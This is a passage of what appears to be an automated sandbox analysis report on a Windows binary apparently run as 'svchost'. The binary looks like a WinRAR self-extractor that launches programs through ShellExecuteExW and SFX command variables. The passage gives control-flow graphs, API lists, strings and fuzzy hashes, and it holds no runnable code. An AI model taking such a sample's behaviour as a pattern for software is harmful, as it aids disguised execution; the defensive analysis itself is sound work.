2193->2199 2194->2189 2203 7ff669acee73 2196->2203 2204 7ff669acee76-7ff669acee7c 2196->2204 2207 7ff669acf125 2197->2207 2208 7ff669acf128-7ff669acf12d 2197->2208 2205 7ff669acee2b-7ff669acee30 2198->2205 2206 7ff669acee28 2198->2206 2199->2187 2229 7ff669acefaf-7ff669acefbc ShellExecuteExW 2201->2229 2230 7ff669acef5c-7ff669acefaa call 7ff669ad68cc call 7ff669aa12c0 call 7ff669ab4ee4 call 7ff669aa1fa8 2201->2230 2202->2201 2203->2204 2204->2197 2213 7ff669acee82-7ff669acee89 2204->2213 2205->2193 2214 7ff669acee3d-7ff669acee45 2205->2214 2206->2205 2207->2208 2210 7ff669acf12f-7ff669acf136 2208->2210 2211 7ff669acf140-7ff669acf148 2208->2211 2216 7ff669acf13b 2210->2216 2217 7ff669acf138 2210->2217 2218 7ff669acf14a 2211->2218 2219 7ff669acf14d-7ff669acf158 2211->2219 2213->2180 2213->2181 2221 7ff669acee4a 2214->2221 2222 7ff669acee47 2214->2222 2216->2211 2217->2216 2218->2219 2219->2182 2221->2187 2222->2221 2231 7ff669acefc2-7ff669acefcc 2229->2231 2232 7ff669acf0a8-7ff669acf0b0 2229->2232 2230->2229 2236 7ff669acefce-7ff669acefd1 2231->2236 2237 7ff669acefdc-7ff669acefdf 2231->2237 2234 7ff669acf0b2-7ff669acf0c8 2232->2234 2235 7ff669acf0e4-7ff669acf0f1 2232->2235 2239 7ff669acf0df call 7ff669ad1c7c 2234->2239 2240 7ff669acf0ca-7ff669acf0dd 2234->2240 2235->2164 2236->2237 2241 7ff669acefd3-7ff669acefda 2236->2241 2242 7ff669acefe1-7ff669acefec call 7ff669b0e190 2237->2242 2243 7ff669aceffb-7ff669acf01a call 7ff669b0e1c0 call 7ff669acf658 2237->2243 2239->2235 2240->2239 2246 7ff669acf15d-7ff669acf163 call 7ff669ad6854 2240->2246 2241->2237 2248 7ff669acf04d-7ff669acf05a CloseHandle 2241->2248 2242->2243 2263 7ff669acefee-7ff669aceff9 ShowWindow 2242->2263 2243->2248 2270 7ff669acf01c-7ff669acf01f 2243->2270 2254 7ff669acf06f-7ff669acf076 2248->2254 2255 7ff669acf05c-7ff669acf06d call 7ff669ac0ad8 2248->2255 2261 7ff669acf090-7ff669acf092 2254->2261 2262 7ff669acf078-7ff669acf07b 2254->2262 2255->2254 2255->2261 2261->2232 2264 7ff669acf094-7ff669acf097 2261->2264 2262->2261 2268 7ff669acf07d-7ff669acf084 2262->2268 2263->2243 2264->2232 2269 7ff669acf099-7ff669acf0a7 ShowWindow 2264->2269 2268->2261 2272 7ff669acf086 2268->2272 2269->2232 2270->2248 2273 7ff669acf021-7ff669acf032 GetExitCodeProcess 2270->2273 2272->2261 2273->2248 2274 7ff669acf034-7ff669acf03e 2273->2274 2275 7ff669acf040 2274->2275 2276 7ff669acf046 2274->2276 2275->2276 2276->2248
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                      • String ID: .exe$.inf$Install$p
                                      • API String ID: 1054546013-3607691742
                                      • Opcode ID: 8fb8fbb352845074909f2ec412d94fe383064ff8ccd775e8df769509cabf2452
                                      • Instruction ID: 24b5a2008189671d35ff245ab57018034e195d83de532fb766e029c24810e8f1
                                      • Opcode Fuzzy Hash: 8fb8fbb352845074909f2ec412d94fe383064ff8ccd775e8df769509cabf2452
                                      • Instruction Fuzzy Hash: 41C17562E08A42D5FB50DF25D9412BD37F1AF89B84F144136DE0D9EAA5EF38E8958340
                                      Function 00007FF669ACE8FC Relevance: 16.6, APIs: 11, Instructions: 102windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                      • String ID:
                                      • API String ID: 3569833718-0
                                      • Opcode ID: 94ed308b943ff656ca038665f94074f57181f8bfd44f591ba4e87b38ee4d187b
                                      • Instruction ID: c26093d1fd1bc1bac198294a24a26ddc27d1983c72944ee754da1e8fce5a19f8
                                      • Opcode Fuzzy Hash: 94ed308b943ff656ca038665f94074f57181f8bfd44f591ba4e87b38ee4d187b
                                      • Instruction Fuzzy Hash: 9841AF31B14646C6F3148F61E914BAE37B0FB4AB88F441535ED4A4BB95CF7DE8098B40
                                      Function 00007FF669AD1350 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 203libraryCOMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2927 7ff669ad1350-7ff669ad13dc call 7ff669ad0f10 2930 7ff669ad13de-7ff669ad1402 call 7ff669ad1298 RaiseException 2927->2930 2931 7ff669ad1407-7ff669ad1424 2927->2931 2939 7ff669ad162b-7ff669ad164b 2930->2939 2933 7ff669ad1426-7ff669ad1437 2931->2933 2934 7ff669ad1439-7ff669ad143d 2931->2934 2936 7ff669ad1440-7ff669ad144c 2933->2936 2934->2936 2937 7ff669ad144e-7ff669ad1460 2936->2937 2938 7ff669ad146d-7ff669ad1470 2936->2938 2947 7ff669ad15fc-7ff669ad1606 2937->2947 2948 7ff669ad1466 2937->2948 2940 7ff669ad1476-7ff669ad1479 2938->2940 2941 7ff669ad1517-7ff669ad151e 2938->2941 2945 7ff669ad1490-7ff669ad14a5 LoadLibraryExA 2940->2945 2946 7ff669ad147b-7ff669ad148e 2940->2946 2943 7ff669ad1532-7ff669ad1535 2941->2943 2944 7ff669ad1520-7ff669ad152f 2941->2944 2949 7ff669ad15da-7ff669ad15f7 call 7ff669ad0e24 2943->2949 2950 7ff669ad153b-7ff669ad153f 2943->2950 2944->2943 2951 7ff669ad14fc-7ff669ad1505 2945->2951 2952 7ff669ad14a7-7ff669ad14ba GetLastError 2945->2952 2946->2945 2946->2951 2962 7ff669ad1623-7ff669ad1628 call 7ff669ad1298 2947->2962 2963 7ff669ad1608-7ff669ad1619 2947->2963 2948->2938 2949->2947 2958 7ff669ad1570-7ff669ad1583 GetProcAddress 2950->2958 2959 7ff669ad1541-7ff669ad1545 2950->2959 2953 7ff669ad1510 2951->2953 2954 7ff669ad1507-7ff669ad150a FreeLibrary 2951->2954 2960 7ff669ad14d1-7ff669ad14f7 call 7ff669ad1298 RaiseException 2952->2960 2961 7ff669ad14bc-7ff669ad14cf 2952->2961 2953->2941 2954->2953 2958->2949 2964 7ff669ad1585-7ff669ad1598 GetLastError 2958->2964 2959->2958 2965 7ff669ad1547-7ff669ad1552 2959->2965 2960->2939 2961->2951 2961->2960 2962->2939 2963->2962 2970 7ff669ad15af-7ff669ad15d6 call 7ff669ad1298 RaiseException call 7ff669ad0f10 2964->2970 2971 7ff669ad159a-7ff669ad15ad 2964->2971 2965->2958 2972 7ff669ad1554-7ff669ad155b 2965->2972 2970->2949 2971->2949 2971->2970 2972->2958 2975 7ff669ad155d-7ff669ad1562 2972->2975 2975->2958 2978 7ff669ad1564-7ff669ad156e 2975->2978 2978->2949 2978->2958
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                      • String ID: H
                                      • API String ID: 948315288-2852464175
                                      • Opcode ID: 7fd1c4134b29a5f5a3c6f87d77d20aaf4a09e7ea0e27b3a11035ada92dbf2ae2
                                      • Instruction ID: fef8329191116685efd00d91366ce14e2c1d432cf2f5a20b100e1c80bf0dceef
                                      • Opcode Fuzzy Hash: 7fd1c4134b29a5f5a3c6f87d77d20aaf4a09e7ea0e27b3a11035ada92dbf2ae2
                                      • Instruction Fuzzy Hash: D5910562A15B62CAEB44CFA5D8446B833F1BB08B98F494535DE0E9BB54EF7CE449C340
                                      Function 00007FF669ACF2BC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CloseCreateValue_invalid_parameter_noinfo_noreturn
                                      • String ID: Software\WinRAR SFX
                                      • API String ID: 207320342-754673328
                                      • Opcode ID: ba30d486b2100a471be5d6af214167eeff464933188ca99c290aca02269e1fac
                                      • Instruction ID: 8a2fe57eecbea8a21d58a596671e8e7c9be7252cab81fbf644e96ea5cbe50927
                                      • Opcode Fuzzy Hash: ba30d486b2100a471be5d6af214167eeff464933188ca99c290aca02269e1fac
                                      • Instruction Fuzzy Hash: 49416E72A08A42D9EB10DF25E8806AD33F4FB88798F415235EE5C8AB99EF7CD554C700
                                      Function 00007FF669ACF540 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 3082 7ff669acf540-7ff669acf56b 3083 7ff669acf570-7ff669acf5a6 SetEnvironmentVariableW call 7ff669abc968 3082->3083 3084 7ff669acf56d 3082->3084 3086 7ff669acf5ab-7ff669acf5ad 3083->3086 3084->3083 3087 7ff669acf5af 3086->3087 3088 7ff669acf5fa-7ff669acf602 3086->3088 3089 7ff669acf5b3-7ff669acf5bb 3087->3089 3090 7ff669acf604-7ff669acf61a 3088->3090 3091 7ff669acf636-7ff669acf651 call 7ff669ad1d90 3088->3091 3093 7ff669acf5c0-7ff669acf5cb call 7ff669abcce8 3089->3093 3094 7ff669acf5bd 3089->3094 3095 7ff669acf631 call 7ff669ad1c7c 3090->3095 3096 7ff669acf61c-7ff669acf62f 3090->3096 3104 7ff669acf5da-7ff669acf5df 3093->3104 3105 7ff669acf5cd-7ff669acf5d8 3093->3105 3094->3093 3095->3091 3096->3095 3097 7ff669acf652-7ff669acf657 call 7ff669ad6854 3096->3097 3106 7ff669acf5e4-7ff669acf5f9 SetEnvironmentVariableW 3104->3106 3107 7ff669acf5e1 3104->3107 3105->3089 3106->3088 3107->3106
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                      • String ID: sfxcmd$sfxpar
                                      • API String ID: 3540648995-3493335439
                                      • Opcode ID: d145f836bdf2eab021226228e8f2a3c48b4484dd07b48e2350f764278c8bd62e
                                      • Instruction ID: 59e7c865b86639716eb9563ce25131ad006b43a6091dd6768e87fb41beac5f28
                                      • Opcode Fuzzy Hash: d145f836bdf2eab021226228e8f2a3c48b4484dd07b48e2350f764278c8bd62e
                                      • Instruction Fuzzy Hash: A8317C62E14A56C4EB00CF69E4801BD33F1EB88B98F144636DE5DAB6A9DF38E085C340
                                      Function 00007FF669ACA844 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Global$Resource$Object$AllocBitmapCreateDeleteGdipLoadLock$FindFreeFromSizeofStreamUnlock
                                      • String ID: ]
                                      • API String ID: 3561356813-3352871620
                                      • Opcode ID: 7a069afb3f149c8acc1719c281d8d8159f5c8f5b95f9bfb414c6076793044167
                                      • Instruction ID: 1bb763a979649f071d7378b344aa93271ffd06291de572430c36d30649e49be9
                                      • Opcode Fuzzy Hash: 7a069afb3f149c8acc1719c281d8d8159f5c8f5b95f9bfb414c6076793044167
                                      • Instruction Fuzzy Hash: F7114621B09606C2FB559F12965527DB3F2AF8DBD4F484034DD4D9FB95EE2CE8058B40
                                      Function 00007FF669ACA644 Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 1266772231-0
                                      • Opcode ID: 9939f4b74b23a281263d85086807279f5d1affe8b5170467d6b3b13192338d18
                                      • Instruction ID: 91ec274154bb18dd71553426aaa27b685e6ac19a3684e8d5532ba598e8397ece
                                      • Opcode Fuzzy Hash: 9939f4b74b23a281263d85086807279f5d1affe8b5170467d6b3b13192338d18
                                      • Instruction Fuzzy Hash: 5FF03722A28942C2FB509F20E994A3B3271FF99B04F845030EE4E89954DF2CD509CB40
                                      Function 00007FF669AB2090 Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,2AAAAAAAAAAAAAAB,00007FF669AB7EEA,?,?,00000000,00007FF669AC31A1), ref: 00007FF669AB20CF
                                      • WriteFile.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,2AAAAAAAAAAAAAAB,00007FF669AB7EEA,?,?,00000000,00007FF669AC31A1), ref: 00007FF669AB211B
                                      • WriteFile.KERNELBASE(?,?,?,?,?,?,?,00000000,00000000,?,2AAAAAAAAAAAAAAB,00007FF669AB7EEA,?,?,00000000,00007FF669AC31A1), ref: 00007FF669AB214A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FileWrite$Handle
                                      • String ID:
                                      • API String ID: 4209713984-0
                                      • Opcode ID: dd5c6d1cf7f5e4687dc538402f4c2870435eeff337d651548b9ced4ab7383243
                                      • Instruction ID: bd75f3bdc87c9b9e3d19117862b66df124b8178483be911bfd4253519937c22f
                                      • Opcode Fuzzy Hash: dd5c6d1cf7f5e4687dc538402f4c2870435eeff337d651548b9ced4ab7383243
                                      • Instruction Fuzzy Hash: D951D322A1868AD2EA54CF25E54437A73B0FF94794F005136EF4D8BA99DF3CE49AC700
                                      Function 00007FF669ACFC30 Relevance: 6.1, APIs: 4, Instructions: 125COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                      • String ID:
                                      • API String ID: 2912839123-0
                                      • Opcode ID: d389d03b20cbad5d38bb32427598483523328e64162a3de504ffe4c209817687
                                      • Instruction ID: a83535e490a2515d173de889ca08b530aac91da9876d81a3420801144ea63b08
                                      • Opcode Fuzzy Hash: d389d03b20cbad5d38bb32427598483523328e64162a3de504ffe4c209817687
                                      • Instruction Fuzzy Hash: DC518FA2F14642C5EF009FA9D4453BC33B2AF457A8F500636DE2C9EBD6DF78D5449240
                                      Function 00007FF669AB2A30 Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2359106489-0
                                      • Opcode ID: 384ed84f5128f0527bc2ee8d99e8da7590fd717a49ec05e9b42326e41c3cfe4e
                                      • Instruction ID: b99f048248566d3f7880f0ee38bd53aa8e9097dbfeaf020a8460397fc38560be
                                      • Opcode Fuzzy Hash: 384ed84f5128f0527bc2ee8d99e8da7590fd717a49ec05e9b42326e41c3cfe4e
                                      • Instruction Fuzzy Hash: FB31A422E1C686C1EA609F25915527D72F1FF98790F504632EE9DCB699DF3CD9428600
                                      Function 00007FF669AB1710 Relevance: 6.1, APIs: 4, Instructions: 66fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FileHandleRead
                                      • String ID:
                                      • API String ID: 2244327787-0
                                      • Opcode ID: 3c6fc8b0f138e048470a0679d010b9966860626a5f3f01854496960ae9183c48
                                      • Instruction ID: ae7426e889bc3db09ea8d6cc8b45d8652c369f6f77aa28664374ad8f8aaad61e
                                      • Opcode Fuzzy Hash: 3c6fc8b0f138e048470a0679d010b9966860626a5f3f01854496960ae9183c48
                                      • Instruction Fuzzy Hash: 1B217132A0C65AC1E6609F12A40023977F4FB41BA4F144931EE4D8F68CDF3CE8D58B00
                                      Function 00007FF669ABE2B0 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF669ABE638: ResetEvent.KERNEL32 ref: 00007FF669ABE651
                                        • Part of subcall function 00007FF669ABE638: ReleaseSemaphore.KERNEL32 ref: 00007FF669ABE667
                                      • ReleaseSemaphore.KERNEL32 ref: 00007FF669ABE2DC
                                      • CloseHandle.KERNELBASE ref: 00007FF669ABE2FB
                                      • DeleteCriticalSection.KERNEL32 ref: 00007FF669ABE312
                                      • CloseHandle.KERNEL32 ref: 00007FF669ABE31F
                                        • Part of subcall function 00007FF669ABE3C4: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF669ABE2C7,?,?,?,00007FF669AB398E,?,?,?), ref: 00007FF669ABE3CB
                                        • Part of subcall function 00007FF669ABE3C4: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF669ABE2C7,?,?,?,00007FF669AB398E,?,?,?), ref: 00007FF669ABE3D6
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                      • String ID:
                                      • API String ID: 502429940-0
                                      • Opcode ID: 90b84fc582fb9ace1cc5f02649ca45b98255c4d1b8865a573d452fb2aaa2ba32
                                      • Instruction ID: 6ae2e139c5a0ab55eae1fa2bfccdf216aac8c5f134a6d38eaa89eb4401581b2e
                                      • Opcode Fuzzy Hash: 90b84fc582fb9ace1cc5f02649ca45b98255c4d1b8865a573d452fb2aaa2ba32
                                      • Instruction Fuzzy Hash: A2018036A14E81D2E648DF25E58426C73B0FB88B90F000030DF6E5B265CF38E4B5C780
                                      Function 00007FF669AC7E34 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: 1ec38dfac997f3b76e363a93e2e6f2561c49e5ee44695f5b4ed3b045c800863f
                                      • Instruction ID: a262a5b016629e234b69f945f59b9ea9b900c84753a800ce633113d8d0c4a33c
                                      • Opcode Fuzzy Hash: 1ec38dfac997f3b76e363a93e2e6f2561c49e5ee44695f5b4ed3b045c800863f
                                      • Instruction Fuzzy Hash: A4E012A0E0960AC2FF085F71A95913B61B0AF5EB41F044839CC1ECE760ED3CA4564784
                                      Function 00007FF669ABE40C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
